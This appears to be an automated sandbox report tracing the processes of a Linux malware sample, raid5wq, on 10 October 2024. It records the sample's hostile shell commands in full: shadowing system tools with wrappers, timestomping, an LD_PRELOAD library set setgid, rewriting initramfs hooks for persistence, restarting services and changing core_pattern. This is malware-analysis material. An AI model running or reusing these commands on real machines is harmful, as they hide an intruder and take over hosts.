MD5 hash:	c65e7bdf676bb1617301efce4b51a409

Analysis Process: bash PID: 6392, Parent PID: 6269

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	/bin/.local/bin/crontab -c "exec '/bin/.local/bin/crontab' \"$@\"" /bin/.local/bin/crontab
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: crontab PID: 6392, Parent PID: 6269

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/bin/.local/bin/crontab
Arguments:	/bin/.local/bin/crontab
File size:	15728 bytes
MD5 hash:	c65e7bdf676bb1617301efce4b51a409

Analysis Process: bash PID: 6392, Parent PID: 6269

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	/bin/.local/bin/crontab -c " " /bin/.local/bin/crontab
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: bash PID: 6393, Parent PID: 6392

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: env PID: 6393, Parent PID: 6392

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/usr/bin/env
Arguments:	env
File size:	43352 bytes
MD5 hash:	a07608ea9b03212885b826d00c37f0ab

Analysis Process: bash PID: 6394, Parent PID: 6392

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: grep PID: 6394, Parent PID: 6392

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/usr/bin/grep
Arguments:	grep -q ABWTRX
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Analysis Process: raid5wq PID: 6395, Parent PID: 6269

General

Start time (UTC):	11:01:22
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: ldd PID: 6395, Parent PID: 6269

General

Start time (UTC):	11:01:22
Start date (UTC):	10/10/2024
Path:	/bin/.local/bin/ldd
Arguments:	/bin/.local/bin/ldd
File size:	15504 bytes
MD5 hash:	cf265a3a3dd068d0aa0c70248cd6325d

Analysis Process: bash PID: 6395, Parent PID: 6269

General

Start time (UTC):	11:01:22
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	/bin/.local/bin/ldd -c "exec '/bin/.local/bin/ldd' \"$@\"" /bin/.local/bin/ldd
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: ldd PID: 6395, Parent PID: 6269

General

Start time (UTC):	11:01:22
Start date (UTC):	10/10/2024
Path:	/bin/.local/bin/ldd
Arguments:	/bin/.local/bin/ldd
File size:	15504 bytes
MD5 hash:	cf265a3a3dd068d0aa0c70248cd6325d

Analysis Process: bash PID: 6395, Parent PID: 6269

General

Start time (UTC):	11:01:22
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	/bin/.local/bin/ldd -c " " /bin/.local/bin/ldd
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: bash PID: 6396, Parent PID: 6395

General

Start time (UTC):	11:01:22
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: env PID: 6396, Parent PID: 6395

General

Start time (UTC):	11:01:22
Start date (UTC):	10/10/2024
Path:	/usr/bin/env
Arguments:	env
File size:	43352 bytes
MD5 hash:	a07608ea9b03212885b826d00c37f0ab

Analysis Process: bash PID: 6397, Parent PID: 6395

General

Start time (UTC):	11:01:22
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: grep PID: 6397, Parent PID: 6395

General

Start time (UTC):	11:01:22
Start date (UTC):	10/10/2024
Path:	/usr/bin/grep
Arguments:	grep -q ABWTRX
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Analysis Process: raid5wq PID: 6398, Parent PID: 6269

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: strace PID: 6398, Parent PID: 6269

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/bin/.local/bin/strace
Arguments:	/bin/.local/bin/strace
File size:	15552 bytes
MD5 hash:	55edcbcd4120224d03185f6ab50e0602

Analysis Process: bash PID: 6398, Parent PID: 6269

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	/bin/.local/bin/strace -c "exec '/bin/.local/bin/strace' \"$@\"" /bin/.local/bin/strace
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: strace PID: 6398, Parent PID: 6269

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/bin/.local/bin/strace
Arguments:	/bin/.local/bin/strace
File size:	15552 bytes
MD5 hash:	55edcbcd4120224d03185f6ab50e0602

Analysis Process: bash PID: 6398, Parent PID: 6269

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	/bin/.local/bin/strace -c " " /bin/.local/bin/strace
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: bash PID: 6401, Parent PID: 6398

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: env PID: 6401, Parent PID: 6398

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/usr/bin/env
Arguments:	env
File size:	43352 bytes
MD5 hash:	a07608ea9b03212885b826d00c37f0ab

Analysis Process: bash PID: 6402, Parent PID: 6398

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: grep PID: 6402, Parent PID: 6398

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/usr/bin/grep
Arguments:	grep -q ABWTRX
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Analysis Process: raid5wq PID: 6403, Parent PID: 6269

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: lsof PID: 6403, Parent PID: 6269

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/bin/.local/bin/lsof
Arguments:	/bin/.local/bin/lsof
File size:	15608 bytes
MD5 hash:	2053098ddcf12ccea2af8c2c180278e5

Analysis Process: bash PID: 6403, Parent PID: 6269

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	/bin/.local/bin/lsof -c "exec '/bin/.local/bin/lsof' \"$@\"" /bin/.local/bin/lsof
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: lsof PID: 6403, Parent PID: 6269

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/bin/.local/bin/lsof
Arguments:	/bin/.local/bin/lsof
File size:	15608 bytes
MD5 hash:	2053098ddcf12ccea2af8c2c180278e5

Analysis Process: bash PID: 6403, Parent PID: 6269

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	/bin/.local/bin/lsof -c " " /bin/.local/bin/lsof
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: bash PID: 6404, Parent PID: 6403

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: env PID: 6404, Parent PID: 6403

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/usr/bin/env
Arguments:	env
File size:	43352 bytes
MD5 hash:	a07608ea9b03212885b826d00c37f0ab

Analysis Process: bash PID: 6405, Parent PID: 6403

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: grep PID: 6405, Parent PID: 6403

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/usr/bin/grep
Arguments:	grep -q ABWTRX
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Analysis Process: raid5wq PID: 6406, Parent PID: 6269

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6406, Parent PID: 6269

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "chmod 755 /bin/.local/bin/;touch -acmr /etc/passwd /bin/.local/bin/"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6407, Parent PID: 6406

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: chmod PID: 6407, Parent PID: 6406

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/usr/bin/chmod
Arguments:	chmod 755 /bin/.local/bin/crontab /bin/.local/bin/htop /bin/.local/bin/ldd /bin/.local/bin/lsof /bin/.local/bin/strace /bin/.local/bin/top
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Analysis Process: sh PID: 6408, Parent PID: 6406

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: touch PID: 6408, Parent PID: 6406

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/usr/bin/touch
Arguments:	touch -acmr /etc/passwd /bin/.local/bin/crontab /bin/.local/bin/htop /bin/.local/bin/ldd /bin/.local/bin/lsof /bin/.local/bin/strace /bin/.local/bin/top
File size:	100728 bytes
MD5 hash:	3859c173f5d3b37be3e531b7c84a9c68

Analysis Process: raid5wq PID: 6409, Parent PID: 6269

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6409, Parent PID: 6269

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "touch /tmp/lgcdm /tmp/d.xdiag-0;unset AAZHDE;LD_PRELOAD=/tmp/libgcwrap.so LGCEXTR=1 ls -la /tmp > /tmp/lgctr 2>&1;rm -f /tmp/d.xdiag-0 /tmp/lgcdm /tmp/libgcwrap.so"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6410, Parent PID: 6409

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: touch PID: 6410, Parent PID: 6409

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/usr/bin/touch
Arguments:	touch /tmp/lgcdm /tmp/d.xdiag-0
File size:	100728 bytes
MD5 hash:	3859c173f5d3b37be3e531b7c84a9c68

Analysis Process: sh PID: 6411, Parent PID: 6409

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: ls PID: 6411, Parent PID: 6409

General

Start time (UTC):	11:01:23
Start date (UTC):	10/10/2024
Path:	/usr/bin/ls
Arguments:	ls -la /tmp
File size:	142144 bytes
MD5 hash:	e7793f15c2ff7e747b4bc7079f5cd4f7

Analysis Process: sh PID: 6412, Parent PID: 6409

General

Start time (UTC):	11:01:24
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: rm PID: 6412, Parent PID: 6409

General

Start time (UTC):	11:01:24
Start date (UTC):	10/10/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/d.xdiag-0 /tmp/lgcdm /tmp/libgcwrap.so
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Analysis Process: raid5wq PID: 6413, Parent PID: 6269

General

Start time (UTC):	11:01:24
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6413, Parent PID: 6269

General

Start time (UTC):	11:01:24
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "LD_PRELOAD=/tmp/libgcwrap.so sh -c 'echo BAQLznamq9t08rtq7O5LDzm0K5nqROAs\|cat > /tmp/lgctr2 2>&1'"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6414, Parent PID: 6413

General

Start time (UTC):	11:01:24
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6414, Parent PID: 6413

General

Start time (UTC):	11:01:24
Start date (UTC):	10/10/2024
Path:	/usr/bin/sh
Arguments:	sh -c "echo BAQLznamq9t08rtq7O5LDzm0K5nqROAs\|cat > /tmp/lgctr2 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6415, Parent PID: 6414

General

Start time (UTC):	11:01:24
Start date (UTC):	10/10/2024
Path:	/usr/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6416, Parent PID: 6414

General

Start time (UTC):	11:01:24
Start date (UTC):	10/10/2024
Path:	/usr/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: cat PID: 6416, Parent PID: 6414

General

Start time (UTC):	11:01:24
Start date (UTC):	10/10/2024
Path:	/usr/bin/cat
Arguments:	cat
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Analysis Process: raid5wq PID: 6417, Parent PID: 6269

General

Start time (UTC):	11:01:25
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6417, Parent PID: 6269

General

Start time (UTC):	11:01:25
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "chmod g+s /lib/libgcwrap.so"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6418, Parent PID: 6417

General

Start time (UTC):	11:01:25
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: chmod PID: 6418, Parent PID: 6417

General

Start time (UTC):	11:01:25
Start date (UTC):	10/10/2024
Path:	/usr/bin/chmod
Arguments:	chmod g+s /lib/libgcwrap.so
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Analysis Process: raid5wq PID: 6419, Parent PID: 6269

General

Start time (UTC):	11:01:25
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6419, Parent PID: 6269

General

Start time (UTC):	11:01:25
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "for f in $(find /usr/share/initramfs-tools/hooks -type f 2>/dev/null\|xargs grep -s -l 'ldd '\|xargs grep -L 'export PATH=.*/\\.local/bin:.PATH');do sed -i '/^#!\\//a export PATH=/bin/.local/bin:$PATH' $f;done"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6420, Parent PID: 6419

General

Start time (UTC):	11:01:25
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6421, Parent PID: 6420

General

Start time (UTC):	11:01:25
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: find PID: 6421, Parent PID: 6420

General

Start time (UTC):	11:01:25
Start date (UTC):	10/10/2024
Path:	/usr/bin/find
Arguments:	find /usr/share/initramfs-tools/hooks -type f
File size:	320160 bytes
MD5 hash:	b68ef002f84cc54dd472238ba7df80ab

Analysis Process: sh PID: 6422, Parent PID: 6420

General

Start time (UTC):	11:01:25
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: xargs PID: 6422, Parent PID: 6420

General

Start time (UTC):	11:01:25
Start date (UTC):	10/10/2024
Path:	/usr/bin/xargs
Arguments:	xargs grep -s -l "ldd "
File size:	76152 bytes
MD5 hash:	67d30da7ca6e766bb5a005e77f928efb

Analysis Process: xargs PID: 6424, Parent PID: 6422

General

Start time (UTC):	11:01:25
Start date (UTC):	10/10/2024
Path:	/usr/bin/xargs
Arguments:	-
File size:	76152 bytes
MD5 hash:	67d30da7ca6e766bb5a005e77f928efb

Analysis Process: grep PID: 6424, Parent PID: 6422

General

Start time (UTC):	11:01:25
Start date (UTC):	10/10/2024
Path:	/usr/bin/grep
Arguments:	grep -s -l "ldd " /usr/share/initramfs-tools/hooks/zz-dhclient /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/cryptpassdev /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/copymods /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/compcache /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/cloud-initramfs-dyn-netconf /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/overlayroot /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/ntfs_3g
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Analysis Process: sh PID: 6423, Parent PID: 6420

General

Start time (UTC):	11:01:25
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: xargs PID: 6423, Parent PID: 6420

General

Start time (UTC):	11:01:25
Start date (UTC):	10/10/2024
Path:	/usr/bin/xargs
Arguments:	xargs grep -L "export PATH=.*/\\.local/bin:.PATH"
File size:	76152 bytes
MD5 hash:	67d30da7ca6e766bb5a005e77f928efb

Analysis Process: xargs PID: 6425, Parent PID: 6423

General

Start time (UTC):	11:01:26
Start date (UTC):	10/10/2024
Path:	/usr/bin/xargs
Arguments:	-
File size:	76152 bytes
MD5 hash:	67d30da7ca6e766bb5a005e77f928efb

Analysis Process: grep PID: 6425, Parent PID: 6423

General

Start time (UTC):	11:01:26
Start date (UTC):	10/10/2024
Path:	/usr/bin/grep
Arguments:	grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptroot
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Analysis Process: sh PID: 6426, Parent PID: 6419

General

Start time (UTC):	11:01:26
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sed PID: 6426, Parent PID: 6419

General

Start time (UTC):	11:01:26
Start date (UTC):	10/10/2024
Path:	/usr/bin/sed
Arguments:	sed -i "/^#!\\//a export PATH=/bin/.local/bin:$PATH" /usr/share/initramfs-tools/hooks/btrfs
File size:	121288 bytes
MD5 hash:	885062561f66aa1d4af4c54b9e7cc81a

Analysis Process: sh PID: 6427, Parent PID: 6419

General

Start time (UTC):	11:01:26
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sed PID: 6427, Parent PID: 6419

General

Start time (UTC):	11:01:26
Start date (UTC):	10/10/2024
Path:	/usr/bin/sed
Arguments:	sed -i "/^#!\\//a export PATH=/bin/.local/bin:$PATH" /usr/share/initramfs-tools/hooks/cryptopensc
File size:	121288 bytes
MD5 hash:	885062561f66aa1d4af4c54b9e7cc81a

Analysis Process: sh PID: 6428, Parent PID: 6419

General

Start time (UTC):	11:01:26
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sed PID: 6428, Parent PID: 6419

General

Start time (UTC):	11:01:26
Start date (UTC):	10/10/2024
Path:	/usr/bin/sed
Arguments:	sed -i "/^#!\\//a export PATH=/bin/.local/bin:$PATH" /usr/share/initramfs-tools/hooks/cryptroot
File size:	121288 bytes
MD5 hash:	885062561f66aa1d4af4c54b9e7cc81a

Analysis Process: raid5wq PID: 6429, Parent PID: 6269

General

Start time (UTC):	11:01:26
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6429, Parent PID: 6269

General

Start time (UTC):	11:01:26
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "systemctl --type=service --state=running\|grep -F -e cron.service -e crond.service -e unattended-upgrades.service -e nginx.service -e apache2.service -e httpd.service -e ssh.service -e sshd.service -e postfix.service -e dovecot.service -e mariadb.service -e mysql.service -e mysqld.service -e systemd-journald\|awk '{print $1}'\|xargs -I{} systemctl try-restart {} >/dev/null 2>/dev/null"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6431, Parent PID: 6429

General

Start time (UTC):	11:01:27
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: systemctl PID: 6431, Parent PID: 6429

General

Start time (UTC):	11:01:27
Start date (UTC):	10/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl --type=service --state=running
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Analysis Process: sh PID: 6432, Parent PID: 6429

General

Start time (UTC):	11:01:27
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: grep PID: 6432, Parent PID: 6429

General

Start time (UTC):	11:01:27
Start date (UTC):	10/10/2024
Path:	/usr/bin/grep
Arguments:	grep -F -e cron.service -e crond.service -e unattended-upgrades.service -e nginx.service -e apache2.service -e httpd.service -e ssh.service -e sshd.service -e postfix.service -e dovecot.service -e mariadb.service -e mysql.service -e mysqld.service -e systemd-journald
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Analysis Process: sh PID: 6433, Parent PID: 6429

General

Start time (UTC):	11:01:27
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: awk PID: 6433, Parent PID: 6429

General

Start time (UTC):	11:01:27
Start date (UTC):	10/10/2024
Path:	/usr/bin/awk
Arguments:	awk "{print $1}"
File size:	711136 bytes
MD5 hash:	7e9b2ed1272331cfbd2aac2e5eb3f84b

Analysis Process: sh PID: 6434, Parent PID: 6429

General

Start time (UTC):	11:01:27
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: xargs PID: 6434, Parent PID: 6429

General

Start time (UTC):	11:01:27
Start date (UTC):	10/10/2024
Path:	/usr/bin/xargs
Arguments:	xargs -I{} systemctl try-restart {}
File size:	76152 bytes
MD5 hash:	67d30da7ca6e766bb5a005e77f928efb

Analysis Process: xargs PID: 6441, Parent PID: 6434

General

Start time (UTC):	11:01:27
Start date (UTC):	10/10/2024
Path:	/usr/bin/xargs
Arguments:	-
File size:	76152 bytes
MD5 hash:	67d30da7ca6e766bb5a005e77f928efb

Analysis Process: systemctl PID: 6441, Parent PID: 6434

General

Start time (UTC):	11:01:27
Start date (UTC):	10/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl try-restart ssh.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Analysis Process: xargs PID: 6472, Parent PID: 6434

General

Start time (UTC):	11:01:29
Start date (UTC):	10/10/2024
Path:	/usr/bin/xargs
Arguments:	-
File size:	76152 bytes
MD5 hash:	67d30da7ca6e766bb5a005e77f928efb

Analysis Process: systemctl PID: 6472, Parent PID: 6434

General

Start time (UTC):	11:01:30
Start date (UTC):	10/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl try-restart systemd-journald.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Analysis Process: xargs PID: 6579, Parent PID: 6434

General

Start time (UTC):	11:01:54
Start date (UTC):	10/10/2024
Path:	/usr/bin/xargs
Arguments:	-
File size:	76152 bytes
MD5 hash:	67d30da7ca6e766bb5a005e77f928efb

Analysis Process: systemctl PID: 6579, Parent PID: 6434

General

Start time (UTC):	11:01:55
Start date (UTC):	10/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl try-restart unattended-upgrades.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Analysis Process: raid5wq PID: 6430, Parent PID: 6269

General

Start time (UTC):	11:01:26
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6430, Parent PID: 6269

General

Start time (UTC):	11:01:26
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "echo '/etc/coredumps/%e.%p.%u.%t' > /proc/sys/kernel/core_pattern"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: raid5wq PID: 6435, Parent PID: 6269

General

Start time (UTC):	11:01:27
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6435, Parent PID: 6269

General

Start time (UTC):	11:01:27
Start date (UTC):	10/10/2024
Path:	/bin/sh
